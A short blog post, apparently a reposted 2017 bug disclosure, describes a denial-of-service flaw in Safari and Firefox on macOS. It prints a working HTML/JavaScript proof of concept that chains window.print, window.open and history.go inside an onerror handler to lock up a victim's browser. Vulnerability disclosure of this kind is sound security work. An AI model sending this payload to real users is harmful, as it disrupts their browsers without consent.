Skip to content
Home » Blog » Denial Of Service Bug Due to Calling window.print in a loop- Safari and Mozilla Web Browser

Denial Of Service Bug Due to Calling window.print in a loop- Safari and Mozilla Web Browser

Backup’d from Blogger.com. Article published date (07/2017)

Calling window.print in a loop Causing DOS in Mozilla and SafariĀ 

Hello All,

This post is about a bug that I reported in Mozilla , Safari and Google Chrome ( MacOS )
This occurs when the browser is not able to properly handle the input . An attacker can send this html to initiate a Denial Of Service attack on the victims browser .
POC :


<html>
<title>DoS</title>
<script>
function dos(){
window.onerror=new Function(history.go(window.open(window.print())));
}
dos();
</script>
</html>

POC Video

Safari :

Status : Reported, Working on a Fix

Mozilla FireFox :

Status : Reported, Working on a Fix


Leave a Reply

Your email address will not be published. Required fields are marked *